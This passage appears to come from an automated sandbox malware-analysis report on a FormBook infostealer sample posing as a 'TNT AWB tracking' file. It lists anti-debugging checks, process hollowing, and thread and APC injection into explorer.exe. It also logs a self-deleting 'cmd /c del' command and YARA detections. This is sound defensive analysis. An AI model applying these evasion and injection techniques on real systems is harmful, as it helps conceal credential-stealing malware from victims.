          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]2_2_034FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]2_2_034D8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428B50 mov eax, dword ptr fs:[00000030h]2_2_03428B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]2_2_034DEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]2_2_0342CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504B00 mov eax, dword ptr fs:[00000030h]2_2_03504B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]2_2_034DEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]2_2_0345EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]2_2_034BCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]2_2_034DEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]2_2_034BCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]2_2_0346CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]2_2_0345EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]2_2_0346CA38
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]2_2_03430AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]2_2_03504A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]2_2_03468A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]2_2_03486AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]2_2_034B0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504940 mov eax, dword ptr fs:[00000030h]2_2_03504940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]2_2_0347096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]2_2_034BC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]2_2_034BC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]2_2_034B892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]2_2_034C892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]2_2_034C69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]2_2_034649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]2_2_034FA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]2_2_034BE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]2_2_034B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]2_2_03442840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]2_2_03460854
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]2_2_034BC810
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00700063 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00700063
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_006FFD20 SetUnhandledExceptionFilter,4_2_006FFD20

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3504Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3504Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 6F0000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 86E008Jump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
          Source: explorer.exe, 00000003.00000000.1454817107.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3837282148.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: TNT AWB TRACKING DETAILS.exe, explorer.exe, 00000003.00000000.1454817107.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000003.2292994901.00000000087E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.1454817107.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3837282148.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.1454817107.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3837282148.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: TNT AWB TRACKING DETAILS.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
          Source: explorer.exe, 00000003.00000000.1454559665.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3832268216.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanq
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: TNT AWB TRACKING DETAILS.exeBinary or memory string: WIN_XP
          Source: TNT AWB TRACKING DETAILS.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 